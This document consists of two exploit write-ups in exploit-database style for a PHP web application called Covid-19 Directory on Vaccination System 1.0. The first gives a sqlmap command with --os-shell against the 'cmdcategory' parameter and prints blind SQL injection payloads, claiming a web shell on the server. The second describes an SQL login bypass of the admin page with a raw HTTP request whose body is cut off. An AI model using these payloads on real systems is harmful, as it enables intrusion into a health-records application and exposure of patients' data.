

# Exploit Title: Covid-19 Directory on Vaccination System 1.0 - 'cmdcategory' SQL Injection

The Covid-19 Directory on Vaccination System is vulnerable to SQL Injection that leads to Remote Code Execution.

Sqlmap -u ' -p cmdcategory --risk=3 --level=5 --threads=10 --keep-alive --os-shell

Now you have a web shell uploaded to the server :

legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Sqlmap resumed the following injection point(s) from stored session:

Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cmdcategory=Private') AND 3773=3773-- fUxB

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cmdcategory=Private') AND (SELECT 9765 FROM (SELECT(SLEEP(5)))DnRk)-- LWnB

Web application technology: PHP 8.1.2, Apache 2.4.52

# Exploit Title: Covid-19 Directory on Vaccination System 1.0 - SQLi Authentication Bypass

1- Go to following url.
>
2- We can login successfully with SQL bypass method.

POST /covid-19-vaccination/admin/login.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Referer:
Cookie: PHPSESSID=dras0itihsadtdkkkv7gv4hf67
